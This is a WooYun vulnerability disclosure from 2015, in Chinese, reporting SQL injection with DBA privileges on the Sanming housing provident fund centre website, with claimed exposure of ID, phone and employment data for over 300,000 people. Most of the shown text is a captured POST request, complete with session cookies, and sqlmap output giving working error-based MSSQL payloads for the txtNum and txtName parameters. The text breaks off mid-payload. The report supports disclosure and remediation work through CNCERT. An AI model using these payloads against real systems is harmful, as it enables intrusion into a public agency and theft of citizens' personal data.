当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134327

漏洞标题:三明公积金中心存在SQL注入(DBA权限)+可获取30余万人身份证、手机、工作信息

相关厂商:三明公积金中心

漏洞作者: 路人甲

提交时间:2015-08-17 18:01

修复时间:2015-10-03 10:12

公开时间:2015-10-03 10:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

发现一处SQL注入,同时禁用了文件读取,但是另一处上传记录处没有修补!~~~
有做了防注入的了,本人不才有些绕不过去就算了!~~~

详细说明:

1、抓包

POST http://www.smgjj.com/BusinessConsulting.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.smgjj.com/BusinessConsulting.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) QQBrowser/8.2.4258.400
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.smgjj.com
Content-Length: 7981
Connection: Keep-Alive
Pragma: no-cache
Cookie: _gscbrs_477307201=1; _gscu_477307201=39621761kckh7n12; _gscs_477307201=t39622311hhxnek41|pv:3; 
ASP.NET_SessionId=j4wpzi45gqjugy45vbyo15rs; DBInformation=DBInformation_T_Information_T_Information.Clicks=,f04afaa5
-4f96-48a2-8836-48d535f49909Guest,; SiteFunction=SiteFunction_House=,1208,
__VIEWSTATE=
%2FwEPDwULLTE1MTA5NzAzNDIPZBYCAgMPZBYUAgEPZBYCAgEPFgIeC18hSXRlbUNvdW50Ag0WGgIBD2QWAmYPFQIOL0hv
bWVQYWdlLmFzcHgG6aaW6aG1ZAICD2QWAmYPFQJHL0luc3RpdHV0aW9uc0ludHJvZHVjZWQuYXNweD9jbGFzcz02YjQzOTY5
OS05MjBlLTQ5YjQtOTViOC01M2Q3M2JkZjdlZTEM5py65p6E566A5LuLZAIDD2QWAmYPFQI
%2BL05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz00ODMwNDgxZC1lMTgwLTQzZTYtYTlmNS1iYmY3ZjliODkxMzMM5pS
%2F562W5rOV6KeEZAIED2QWAmYPFQI
%2BL05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz1jNGM3YTA4YS01ZGJkLTQ3OTEtODhlZS1kODJhZjRjZTRmOGEM6LWE6K6v5L
%2Bh5oGvZAIFD2QWAmYPFQITL0luZm9ybWF0aW9uWm4uYXNweAzkv6Hmga
%2FlhazlvIBkAgYPZBYCZg8VAj0vTGF3R3VpZGVNYWluLmFzcHg
%2FY2xhc3M9Yzk1NzY5NWItZjBjNS00OWVjLWExMjktYWZmZjdmYjU0ZTdmDOWKnuS6i%2BaMh
%2BWNl2QCBw9kFgJmDxUCPy9Mb2FuYWJsZUVzdGF0ZS5hc3B4P2NsYXNzPTliOTYzNDNiLTAwNTEtNGJjMS1hNjNjLTNkYmY2Z
GE2MTlhMwzlj6%2FotLfmpbznm5hkAggPZBYCZg8VAhEvTWVtYmVyTG9naW4uYXNweAzlnKjnur
%2Fmn6Xor6JkAgkPZBYCZg8VAhgvQnVzaW5lc3NDb25zdWx0aW5nLmFzcHgM5Zyo57q%2F5ZKo6K
%2BiZAIKD2QWAmYPFQIRL0NvbW11bmljYXRlLmFzcHgM5Lit5b%2BD5Zyw5Zu
%2BZAILD2QWAmYPFQIPL1Rvb2xzTGlzdC5hc3B4DOW4uOeUqOW3peWFt2QCDA9kFgJmDxUCEi9Eb3duTG9hZExpc3QuYXNwe
AzkuIvovb3kuK3lv4NkAg0PZBYCZg8VAhMvUGVyZkRlbWFuZHNUSi5hc3B4DOaViOiDveivieaxgmQCCQ8QZA8WBmYCAQICAgM
CBAIFFgYQBQ0tLeivt%2BmAieaLqS0tZWcQBRXkvY%2FmiL%2Flhaznp6%2Fph5HlvIDmiLcFATBnEAUV5L2P5oi
%2F5YWs56ev6YeR57y05a2YBQExZxAFFeS9j%2BaIv%2BWFrOenr%2BmHkeaUr%2BWPlgUBMmcQBRXkvY%2FmiL
%2Flhaznp6%2Fph5HotLfmrL4FATNnEAUG5YW25LuWBQE0Z2RkAhcPDxYCHgRUZXh0BQcyNDU0MTgwZGQCGQ8PFgIfAQUq5L
iJ5piO5biC5L2P5oi%2F5YWs56ev6YeR5Lia5Yqh5ZKo6K%2Bi54Ot57q
%2FZGQCGw8PFgIfAQUFMTIzMjlkZAIdDw8WAh8BBSHmipXor4nnm5HnnaPnlLXor53vvJowNTk4LTgyNzY3NjlkZAIfD2QWBAIFD
xBkDxYGZgIBAgICAwIEAgUWBhAFDS0t6K%2B36YCJ5oupLS1lZxAFFeS9j%2BaIv%2BWFrOenr
%2BmHkeW8gOaItwUBMGcQBRXkvY%2FmiL%2Flhaznp6%2Fph5HnvLTlrZgFATFnEAUV5L2P5oi%2F5YWs56ev6YeR5pSv5Y
%2BWBQEyZxAFFeS9j%2BaIv%2BWFrOenr%2BmHkei0t
%2BasvgUBM2cQBQblhbbku5YFATRnFgFmZAIJDxBkEBUQCeW4guS4reW%2Fgw%2FotYTph5HlvZLpm4bnp5EP6LWE6YeR6L
%2BQ5L2c56eRD%2BiuoeWIkui0ouWKoeenkQ%2FlrqHorqHnm5HnnaPnp5EP57u85ZCI566h55CG56eRD%2BWkp
%2BeUsOeuoeeQhumDqA%2FmsLjlronnrqHnkIbpg6gP5piO5rqq566h55CG6YOoD%2Ba4hea1geeuoeeQhumDqA
%2FlroHljJbnrqHnkIbpg6gP5bu65a6B566h55CG6YOoD%2BazsOWugeeuoeeQhumDqA
%2FlsIbkuZDnrqHnkIbpg6gP5rKZ5Y6%2F566h55CG6YOoD
%2BWwpOa6queuoeeQhumDqBUQBDAxMDAEMDEwMQQwMTAyBDAxMDMEMDEwNAQwMTA1BDAyMDAEMDMwMAQwN
DAwBDA1MDAEMDYwMAQwNzAwBDA4MDAEMDkwMAQxMDAwBDExMDAUKwMQZ2dnZ2dnZ2dnZ2dnZ2dnZxYBZmQCIQ8
WAh8AAgUWCgIBD2QWBmYPFQEJ6ZmI5rC05p2%2BZAIBDw8WAh8BBQblhbbku5ZkZAICDxUFG
%2BaAjuS5iOWPmOabtOWFrOenr
%2BmHkemineW6pgoyMDE1LTA4LTAzQuaIkeS4gOWJjee8tOeahOmineW6puWkquWwkeS6hiAgIOaIkeaDs
%2BWkmuS6pOS4gOeCueimgeaAjuS5iOaUue
%2B8n0%2FnlLHljZXkvY3otKLliqHlnKjmr4%2FlubTnmoQ344CBOOS4pOaciOWKnueQhuWFrOenr
%2BmHkeWfuuaVsOaguOWumuWSjOiwg
%2BaVtOOAgg0KCjIwMTUtMDgtMTFkAgIPZBYGZg8VAQPmnahkAgEPDxYCHwEFFeS9j%2BaIv%2BWFrOenr%2BmHkeaUr
%2BWPlmRkAgIPFQUG6L%2BY6LS3CjIwMTUtMDctMzGwAeWJjeWHoOW5tOeUqOWFrOenr%2BmHkei0t%2Basvui0reaIv%2B
%2B8jOeOsOWcqOWFrOenr%2BmHkee8tOi0ueagh%2BWHhumrmOS6hu%2B8jOiDveS4jeiDveaPkOmrmOi%2FmOi0t%2Bagh
%2BWHhu%2B8jOaPkOWJjei%2FmOa4hei0t%2BasvuOAguaIluiAheWFrOenr%2BmHkei
%2FmOacieayoeacieWFtuS7lueUqOmAlO%2B8n%2Biwouiwou%2B8gQ0KSuS4jeiDveaPkOmrmOaciOi%2FmOasvumine
%2B8jOS9huWPr%2BS7peaPkOWJjeW9kui
%2FmOmDqOWIhuaIluWFqOmDqOacrOmHkeOAgg0KCjIwMTUtMDgtMTFkAgMPZBYGZg8VAQnlj7bpl73pobpkAgEPDxYCHwE
FFeS9j%2BaIv%2BWFrOenr%2BmHkeaUr%2BWPlmRkAgIPFQUP5o%2BQ5Y
%2BW5YWs56ev6YeRCjIwMTUtMDctMzFC5pys5Lq65Zyo56aP5bee6LSt5Lmw5LqG5ZWG5ZOB5oi%2F77yM6IO95ZCm5o
%2BQ5Y%2BW5YWs56ev6YeR6L%2BY6LS344CCC
%2BS4jeihjOOAgg0KCjIwMTUtMDgtMTFkAgQPZBYGZg8VAQPmnahkAgEPDxYCHwEFBuWFtuS7lmRkAgIPFQUM5bel6LWE5Z
%2B65pWwCjIwMTUtMDctMzFX6IGM5bel5LiK5bm05pyI5bmz5Z2H5bel6LWE5YyF5ZCr5ZOq5Lqb77yM6K%2B36K
%2Bm57uG5Lqb44CC5ZCM5Z%2BO5piv5LiN5piv5bqU6K
%2Bl5LiA6Ie077yftgMyMDE15bm05bqm77yIMjAxNeW5tDfmnIgx5pel6IezMjAxNuW5tDbmnIgzMOaXpe%2B8jOS4i
%2BWQjCDvvInogYzlt6XkvY%2FmiL
%2Flhaznp6%2Fph5HnmoTmnIjnvLTlrZjlt6XotYTln7rmlbDkuLrogYzlt6XmnKzkurrkuIrlubTmnIjlubPlnYflt6XotYTjgILogYzlt6Xlt6Xot
YTmgLvpop3nmoTorqHnrpfmjInnhaflm73lrrbnu5%2ForqHlsYDjgIrlhbPkuo7orqTnnJ%2FotK
%2FlvbvmiafooYzjgIjlt6XotYTmgLvpop3nu4TmiJDnmoTop4TlrprjgInnmoTpgJrnn6XjgIvvvIjnu5%2FliLblrppbMTk5MF0x5Y
%2B377yJ5ZKM44CK5YWz5LqO5py65YWz5ZKM5LqL5Lia5Y2V5L2N5bel5L2c5Lq65ZGY5bel6LWE5Yi25bqm5pS56Z2p5ZCO5Yqz5Y
qo57uf6K6h6Iul5bmy6Zeu6aKY55qE6YCa55%2Bl44CL77yI5Zu957uf5a2XWzE5OTRdMzflj7fvvInnmoTop4TlrprmiafooYzjgIIgDQoK
MjAxNS0wOC0xMWQCBQ9kFgZmDxUBBuWwj%2BW8oGQCAQ8PFgIfAQUV5L2P5oi%2F5YWs56ev6YeR6LS35qy
%2BZGQCAg8VBTPpgJDlubTlhrLov5jotLflpoLkvZXovazkuLrlvZLov5jpg6jliIbotLfmrL7mnKzph5EKMjAxNS0wNy0zMJAC5aSr5aa75L
%2Bp5piv5riF5rWB5Lq677yM5YWs56ev6YeR5Zyo5riF5rWB77yM5oiR5L%2Bp5Zyo5LiJ5piO5Lmw5oi
%2F77yM5LqOMjAxNOW5tDnmnIjlnKjkuInmmI7lhaznp6%2Fph5Hlip7nkIbpgJDlubTlhrLov5jotLfkuJrliqHvvIznjrDlnKjmiJHkuIjlpKv
mg7Pmj5Dlj5bkvY%2FmiL
%2Flhaznp6%2Fph5HlvZLov5jpg6jliIbotLfmrL7mnKzph5HvvIzogIzmiJHmnKzkurrnu6fnu63lip7nkIbpgJDlubTlhrLov5jotLfkuJrliqHj
gILor7fpl67lpoLkvZXlip7nkIbkuJrliqHjgIJw6K
%2B35Yiw5YWs56ev6YeR566h55CG6YOo5Yqe55CG5q2k6aG55Lia5Yqh77yM5YW35L2T5Yqe55CG5rWB56iL5Y
%2Bv5Lul5ouo5omT5oiR5Lit5b%2BD5pyN5Yqh54Ot57q
%2FMTIzMjnlkqjor6LjgIINCgoyMDE1LTA4LTExZAIlDw8WBB4NUGFnZXJQYWdlU2l6ZQIFHg5QYWdlclJlY29yZE51bQLoD2RkAicPZ
BYIAgEPEA8WBh4NRGF0YVRleHRGaWVsZAUITGlua05hbWUeDkRhdGFWYWx1ZUZpZWxkBQdMaW5rVXJsHgtfIURhdGFCb3VuZ
GdkEBUDEy0tLeWQiOS9nOWNleS9jS0tLS0e5LiJ5piO5oi%2F5Zyw5Lqn566h55CG5L%2Bh5oGv572RHuS4ieaYjuS9j%2BaIv
%2Be9ruS4muaLheS
%2FneWFrOWPuBUDABdodHRwOi8vd3d3LnNtZmRjLmNvbS5jbhNodHRwOi8vd3d3LnNtZmRjLmNuFCsDA2dnZ2RkAgMPEA8W
Bh8EBQhMaW5rTmFtZR8FBQdMaW5rVXJsHwZnZBAVBRMtLS3mlL%2Flupzpg6jpl6gtLS0tG%2BS4ieaYjuW4guS6uuawkeaUv
%2BW6nOe9keermR7kuK3lpK7kurrmsJHmlL%2Flupzpl6jmiLfnvZHnq5kY56aP5bu655yB5bu66K6%2B5L%2Bh5oGv572REuemj
%2BW7uuecgei0ouaUv
%2BWOhRUFABRodHRwOi8vd3d3LnNtLmdvdi5jbhJodHRwOi8vd3d3Lmdvdi5jbi8XaHR0cDovL3d3dy5mampzLmdvdi5jbi8ZaHR0c
DovL3d3dy5mamljcGEub3JnLmNuLxQrAwVnZ2dnZ2RkAgUPEA8WBh8EBQhMaW5rTmFtZR8FBQdMaW5rVXJsHwZnZBAVDBYtLS
3lhbbku5blhaznp6%2Fph5EtLS0tG%2Bemj%2BW3nuS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvljqbpl6jkvY%2FmiL
%2Flhaznp6%2Fph5HnvZHnq5kb5ryz5bee5L2P5oi%2F5YWs56ev6YeR572R56uZG%2BazieW3nuS9j%2BaIv%2BWFrOenr
%2BmHkee9keermRvpvpnlsqnkvY%2FmiL%2Flhaznp6%2Fph5HnvZHnq5kb5Y2X5bmz5L2P5oi%2F5YWs56ev6YeR572R56uZG
%2BWugeW%2Bt%2BS9j%2BaIv%2BWFrOenr%2BmHkee9keermRvojobnlLDkvY%2FmiL
%2Flhaznp6%2Fph5HnvZHnq5kb5YyX5Lqs5L2P5oi%2F5YWs56ev6YeR572R56uZG%2BS4iua1t%2BS9j%2BaIv%2BWFrOenr
%2BmHkee9keermRvlpKnmtKXkvY%2FmiL
%2Flhaznp6%2Fph5HnvZHnq5kVDAAWaHR0cDovL3d3dy5menpmZ2pqLmNvbRdodHRwOi8vd3d3LnhtZ2pqLmdvdi5jbhhodHRw
Oi8vd3d3Lnp6Z2pqLmdvdi5jbi8UaHR0cDovL3d3dy5xemdqai5jb20ZaHR0cDovL3d3dy5sb25neWFuZ2pqLmNvbRRodHRwOi8vd3d
3Lm5wZ2pqLmNvbRRodHRwOi8vd3d3Lm5kZ2pqLmNvbRRodHRwOi8vd3d3LnB0Z2pqLmNvbRdodHRwOi8vd3d3LmJqZ2pqLmdv
di5jbhRodHRwOi8vd3d3LnNoZ2pqLmNvbRdodHRwOi8vd3d3LmhvdXNlZnVuZC5jbhQrAwxnZ2dnZ2dnZ2dnZ2dkZAIHDxAPFgYf
BAUITGlua05hbWUfBQUHTGlua1VybB8GZ2QQFQgTLS0t5YW25LuW572R56uZLS0tLQ%2FmiL%2FkuqfkuYvnqpfnvZEG55m
%2B5bqmCeS6uuawkee9kQnlkozorq%2FnvZEJ5paw5Y2O572RD%2Bemj%2BW3nuaQnOaIv
%2Be9kQnkuK3ljY7nvZEVCAAYaHR0cDovL3d3dy5laG9tZWRheS5jb20vFGh0dHA6Ly93d3cuYmFpZHUuY29tGWh0dHA6Ly93d3cu
cGVvcGxlLmNvbS5jbi8VaHR0cDovL3d3dy5oZXh1bi5jb20vGWh0dHA6Ly93d3cueGluaHVhbmV0LmNvbS8VaHR0cDovL2Z6LnNvd
WZ1bi5jb20vG2h0dHA6Ly93d3cuY2hpbmEuY29tL3poX2NuLxQrAwhnZ2dnZ2dnZ2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJ
hY2tLZXlfXxYDBQ5pbWdXb1lhb0xpdVlhbgUPaW1nU3VvWW91TGl1WWFuBQlidG5TZWFyY2hHU5WsOeLNURhDdMD4YguEKHX
OhQ%3D%3D&__EVENTVALIDATION=%2FwEWLgK1ioylBwLu2pbfAwLHoITABwKL
%2B9LNBwLdtoOaCwLN2an0BwLS2an0BwLT2an0BwLQ2an0BwLR2an0BwLE2qDWDwKG
%2B5ajBwLEhISFCwKe66LgAgKf66LgAgKc66LgAgKb%2B8ahBAKln%2FPuCgK9l%2BPkCwKN5NbZBwLb2KFcAuXp1uwLAv
%2BYtpwJAvzjt4ACApbribUJAtON%2BOkCAuGR%2B4QKAveSyOQNApCGuoUEArmSlLwKArfNzccIAr
%2FFrYAMAvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcOArb4gqUJAtL4xMcOAuGA1Z8HAvD9k
DgCkt303QkCtfe5hgxWbSV5LGmy1%2FjwpAb46N3VOJVvrw%3D%3D&txtkey=1&drpSearch=0&txtStart=2012-08-
15&txtEnd=2015-08-
15&txtName=2&dlstRange=2&txtNum=1&ddlPageIndex=1&HomePageBottomInfo1%24dlsthzdw=&HomePageBottomInfo1
%24dlstzfbm=&HomePageBottomInfo1%24dlstqtgjj=&HomePageBottomInfo1%24dlstqtwz=&btnSearch.x=33&btnSearch.y=1
4


txtNum、txtName存在注入

sqlmap identified the following injection points with a total of 2308 HTTP(s) re
quests:
---
Place: POST
Parameter: txtNum
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE1MTA5NzAzNDIPZBYCAgMPZBYWAgEPZBYCAgEPFgIeC18
hSXRlbUNvdW50Ag0WGgIBD2QWAmYPFQIOL0hvbWVQYWdlLmFzcHgG6aaW6aG1ZAICD2QWAmYPFQJHL0l
uc3RpdHV0aW9uc0ludHJvZHVjZWQuYXNweD9jbGFzcz02YjQzOTY5OS05MjBlLTQ5YjQtOTViOC01M2Q
3M2JkZjdlZTEM5py65p6E566A5LuLZAIDD2QWAmYPFQI+L05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz0
0ODMwNDgxZC1lMTgwLTQzZTYtYTlmNS1iYmY3ZjliODkxMzMM5pS/562W5rOV6KeEZAIED2QWAmYPFQI
+L05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz1jNGM3YTA4YS01ZGJkLTQ3OTEtODhlZS1kODJhZjRjZTR
mOGEM6LWE6K6v5L+h5oGvZAIFD2QWAmYPFQITL0luZm9ybWF0aW9uWm4uYXNweAzkv6Hmga/lhazlvIB
kAgYPZBYCZg8VAj0vTGF3R3VpZGVNYWluLmFzcHg/Y2xhc3M9Yzk1NzY5NWItZjBjNS00OWVjLWExMjk
tYWZmZjdmYjU0ZTdmDOWKnuS6i+aMh+WNl2QCBw9kFgJmDxUCPy9Mb2FuYWJsZUVzdGF0ZS5hc3B4P2N
sYXNzPTliOTYzNDNiLTAwNTEtNGJjMS1hNjNjLTNkYmY2ZGE2MTlhMwzlj6/otLfmpbznm5hkAggPZBY
CZg8VAhEvTWVtYmVyTG9naW4uYXNweAzlnKjnur/mn6Xor6JkAgkPZBYCZg8VAhgvQnVzaW5lc3NDb25
zdWx0aW5nLmFzcHgM5Zyo57q/5ZKo6K+iZAIKD2QWAmYPFQIRL0NvbW11bmljYXRlLmFzcHgM5Lit5b+
D5Zyw5Zu+ZAILD2QWAmYPFQIPL1Rvb2xzTGlzdC5hc3B4DOW4uOeUqOW3peWFt2QCDA9kFgJmDxUCEi9
Eb3duTG9hZExpc3QuYXNweAzkuIvovb3kuK3lv4NkAg0PZBYCZg8VAhMvUGVyZkRlbWFuZHNUSi5hc3B
4DOaViOiDveivieaxgmQCCQ8QZA8WBmYCAQICAgMCBAIFFgYQBQ0tLeivt+mAieaLqS0tZWcQBRXkvY/
miL/lhaznp6/ph5HlvIDmiLcFATBnEAUV5L2P5oi/5YWs56ev6YeR57y05a2YBQExZxAFFeS9j+aIv+W
FrOenr+mHkeaUr+WPlgUBMmcQBRXkvY/miL/lhaznp6/ph5HotLfmrL4FATNnEAUG5YW25LuWBQE0Z2R
kAhcPDxYCHgRUZXh0BQcyNDU0MTgwZGQCGQ8PFgIfAQUq5LiJ5piO5biC5L2P5oi/5YWs56ev6YeR5Li
a5Yqh5ZKo6K+i54Ot57q/ZGQCGw8PFgIfAQUFMTIzMjlkZAIdDw8WAh8BBSHmipXor4nnm5HnnaPnlLX
or53vvJowNTk4LTgyNzY3NjlkZAIfD2QWBAIFDxBkDxYGZgIBAgICAwIEAgUWBhAFDS0t6K+36YCJ5ou
pLS1lZxAFFeS9j+aIv+WFrOenr+mHkeW8gOaItwUBMGcQBRXkvY/miL/lhaznp6/ph5HnvLTlrZgFATF
nEAUV5L2P5oi/5YWs56ev6YeR5pSv5Y+WBQEyZxAFFeS9j+aIv+WFrOenr+mHkei0t+asvgUBM2cQBQb
lhbbku5YFATRnFgFmZAIJDxBkEBUQCeW4guS4reW/gw/otYTph5HlvZLpm4bnp5EP6LWE6YeR6L+Q5L2
c56eRD+iuoeWIkui0ouWKoeenkQ/lrqHorqHnm5HnnaPnp5EP57u85ZCI566h55CG56eRD+Wkp+eUsOe
uoeeQhumDqA/msLjlronnrqHnkIbpg6gP5piO5rqq566h55CG6YOoD+a4hea1geeuoeeQhumDqA/lroH
ljJbnrqHnkIbpg6gP5bu65a6B566h55CG6YOoD+azsOWugeeuoeeQhumDqA/lsIbkuZDnrqHnkIbpg6g
P5rKZ5Y6/566h55CG6YOoD+WwpOa6queuoeeQhumDqBUQBDAxMDAEMDEwMQQwMTAyBDAxMDMEMDEwNAQ
wMTA1BDAyMDAEMDMwMAQwNDAwBDA1MDAEMDYwMAQwNzAwBDA4MDAEMDkwMAQxMDAwBDExMDAUKwMQZ2d
nZ2dnZ2dnZ2dnZ2dnZxYBZmQCIQ8WAh8AZmQCIw8PFgIeB1Zpc2libGVnZGQCJQ8PFgYeDVBhZ2VyUGF
nZVNpemUCBR4OUGFnZXJSZWNvcmROdW1mHg5QYWdlclBhZ2VJbmRleAIBZGQCJw9kFggCAQ8QDxYGHg1
EYXRhVGV4dEZpZWxkBQhMaW5rTmFtZR4ORGF0YVZhbHVlRmllbGQFB0xpbmtVcmweC18hRGF0YUJvdW5
kZ2QQFQMTLS0t5ZCI5L2c5Y2V5L2NLS0tLR7kuInmmI7miL/lnLDkuqfnrqHnkIbkv6Hmga/nvZEe5Li
J5piO5L2P5oi/572u5Lia5ouF5L+d5YWs5Y+4FQMAF2h0dHA6Ly93d3cuc21mZGMuY29tLmNuE2h0dHA
6Ly93d3cuc21mZGMuY24UKwMDZ2dnZGQCAw8QDxYGHwYFCExpbmtOYW1lHwcFB0xpbmtVcmwfCGdkEBU
FEy0tLeaUv+W6nOmDqOmXqC0tLS0b5LiJ5piO5biC5Lq65rCR5pS/5bqc572R56uZHuS4reWkruS6uua
wkeaUv+W6nOmXqOaIt+e9keermRjnpo/lu7rnnIHlu7rorr7kv6Hmga/nvZES56aP5bu655yB6LSi5pS
/5Y6FFQUAFGh0dHA6Ly93d3cuc20uZ292LmNuEmh0dHA6Ly93d3cuZ292LmNuLxdodHRwOi8vd3d3LmZ
qanMuZ292LmNuLxlodHRwOi8vd3d3LmZqaWNwYS5vcmcuY24vFCsDBWdnZ2dnZGQCBQ8QDxYGHwYFCEx
pbmtOYW1lHwcFB0xpbmtVcmwfCGdkEBUMFi0tLeWFtuS7luWFrOenr+mHkS0tLS0b56aP5bee5L2P5oi
/5YWs56ev6YeR572R56uZG+WOpumXqOS9j+aIv+WFrOenr+mHkee9keermRvmvLPlt57kvY/miL/lhaz
np6/ph5HnvZHnq5kb5rOJ5bee5L2P5oi/5YWs56ev6YeR572R56uZG+m+meWyqeS9j+aIv+WFrOenr+m
Hkee9keermRvljZflubPkvY/miL/lhaznp6/ph5HnvZHnq5kb5a6B5b635L2P5oi/5YWs56ev6YeR572
R56uZG+iOhueUsOS9j+aIv+WFrOenr+mHkee9keermRvljJfkuqzkvY/miL/lhaznp6/ph5HnvZHnq5k
b5LiK5rW35L2P5oi/5YWs56ev6YeR572R56uZG+Wkqea0peS9j+aIv+WFrOenr+mHkee9keermRUMABZ
odHRwOi8vd3d3LmZ6emZnamouY29tF2h0dHA6Ly93d3cueG1namouZ292LmNuGGh0dHA6Ly93d3cuenp
namouZ292LmNuLxRodHRwOi8vd3d3LnF6Z2pqLmNvbRlodHRwOi8vd3d3Lmxvbmd5YW5namouY29tFGh
0dHA6Ly93d3cubnBnamouY29tFGh0dHA6Ly93d3cubmRnamouY29tFGh0dHA6Ly93d3cucHRnamouY29
tF2h0dHA6Ly93d3cuYmpnamouZ292LmNuFGh0dHA6Ly93d3cuc2hnamouY29tF2h0dHA6Ly93d3cuaG9
1c2VmdW5kLmNuFCsDDGdnZ2dnZ2dnZ2dnZ2RkAgcPEA8WBh8GBQhMaW5rTmFtZR8HBQdMaW5rVXJsHwh
nZBAVCBMtLS3lhbbku5bnvZHnq5ktLS0tD+aIv+S6p+S5i+eql+e9kQbnmb7luqYJ5Lq65rCR572RCeW
SjOiur+e9kQnmlrDljY7nvZEP56aP5bee5pCc5oi/572RCeS4reWNjue9kRUIABhodHRwOi8vd3d3LmV
ob21lZGF5LmNvbS8UaHR0cDovL3d3dy5iYWlkdS5jb20ZaHR0cDovL3d3dy5wZW9wbGUuY29tLmNuLxV
odHRwOi8vd3d3LmhleHVuLmNvbS8ZaHR0cDovL3d3dy54aW5odWFuZXQuY29tLxVodHRwOi8vZnouc29
1ZnVuLmNvbS8baHR0cDovL3d3dy5jaGluYS5jb20vemhfY24vFCsDCGdnZ2dnZ2dnZGQYAQUeX19Db25
0cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFDmltZ1dvWWFvTGl1WWFuBQ9pbWdTdW9Zb3VMaXVZYW4
FCWJ0blNlYXJjaDS79vZyaNg/Si/Qvfd08ltzABpu&__EVENTVALIDATION=/wEWLgKro+2nDQLu2pbf
AwLHoITABwKL+9LNBwLdtoOaCwLN2an0BwLS2an0BwLT2an0BwLQ2an0BwLR2an0BwLE2qDWDwKG+5aj
BwLEhISFCwKe66LgAgKf66LgAgKc66LgAgKb+8ahBAKln/PuCgK9l+PkCwKN5NbZBwLb2KFcAuXp1uwL
Av+YtpwJAvzjt4ACApbribUJAtON+OkCAuGR+4QKAveSyOQNApCGuoUEArmSlLwKArfNzccIAr/FrYAM
AvHPoesKAv3KoesKAo3P2fQKAvTZrrUEAunJhecNAujOz4UCAsvBnsQFAtmxrLcOArb4gqUJAtL4xMcO
AuGA1Z8HAvD9kDgCkt303QkCtfe5hgzzQoCFRGmiTihZZ/sQvN+N8yI+zw==&txtkey=1&drpSearch=
0&txtStart=2012-08-15&txtEnd=2015-08-15&txtName=2&dlstRange=2&txtNum=1' AND 7297
=CONVERT(INT,(SELECT CHAR(113)+CHAR(109)+CHAR(120)+CHAR(100)+CHAR(113)+(SELECT (
CASE WHEN (7297=7297) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(116)+CHAR
(109)+CHAR(106)+CHAR(113))) AND 'iMLY'='iMLY&ddlPageIndex=1&HomePageBottomInfo1$
dlsthzdw=&HomePageBottomInfo1$dlstzfbm=&HomePageBottomInfo1$dlstqtgjj=&HomePageB
ottomInfo1$dlstqtwz=&btnSearch.x=33&btnSearch.y=14
Place: POST
Parameter: txtName
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwULLTE1MTA5NzAzNDIPZBYCAgMPZBYWAgEPZBYCAgEPFgIeC18
hSXRlbUNvdW50Ag0WGgIBD2QWAmYPFQIOL0hvbWVQYWdlLmFzcHgG6aaW6aG1ZAICD2QWAmYPFQJHL0l
uc3RpdHV0aW9uc0ludHJvZHVjZWQuYXNweD9jbGFzcz02YjQzOTY5OS05MjBlLTQ5YjQtOTViOC01M2Q
3M2JkZjdlZTEM5py65p6E566A5LuLZAIDD2QWAmYPFQI+L05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz0
0ODMwNDgxZC1lMTgwLTQzZTYtYTlmNS1iYmY3ZjliODkxMzMM5pS/562W5rOV6KeEZAIED2QWAmYPFQI
+L05ld3NCb2xja0xpc3QuYXNweD9jbGFzcz1jNGM3YTA4YS01ZGJkLTQ3OTEtODhlZS1kODJhZjRjZTR
mOGEM6LWE6K6v5L+h5oGvZAIFD2QWAmYPFQITL0luZm9ybWF0aW9uWm4uYXNweAzkv6Hmga/lhazlvIB
kAgYPZBYCZg8VAj0vTGF3R3VpZGVNYWluLmFzcHg/Y2xhc3M9Yzk1NzY5NWItZjBjNS00OWVjLWExMjk
tYWZmZjdmYjU0ZTdmDOWKnuS6i+aMh+WNl2QCBw9kFgJmDxUCPy9Mb2FuYWJsZUVzdGF0ZS5hc3B4P2N
sYXNzPTliOTYzNDNiLTAwNTEtNGJjMS1hNjNjLTNkYmY2ZGE2MTlhMwzlj6/otLfmpbznm5hkAggPZBY
CZg8VAhEvTWVtYmVyTG9naW4uYXNweAzlnKjnur/mn6Xor6JkAgkPZBYCZg8VAhgvQnVzaW5lc3NDb25
zdWx0aW5nLmFzcHgM5Zyo57q/5ZKo6K+iZAIKD2QWAmYPFQIRL0NvbW11bmljYXRlLmFzcHgM5Lit5b+
D5Zyw5Zu+ZAILD2QWAmYPFQIPL1Rvb2xzTGlzdC5hc3B4DOW4uOeUqOW3peWFt2QCDA9kFgJmDxUCEi9
Eb3duTG9hZExpc3QuYXNweAzkuIvovb3kuK3lv4NkAg0PZBYCZg8VAhMvUGVyZkRlbWFuZHNUSi5hc3B
4DOaViOiDveivieaxgmQCCQ8QZA8WBmYCAQICAgMCBAIFFgYQBQ0tLeivt+mAieaLqS0tZWcQBRXkvY/
miL/lhaznp6/ph5HlvIDmiLcFATBnEAUV5L2P5oi/5YWs56ev6YeR57y05a2YBQExZxAFFeS9j+aIv+W
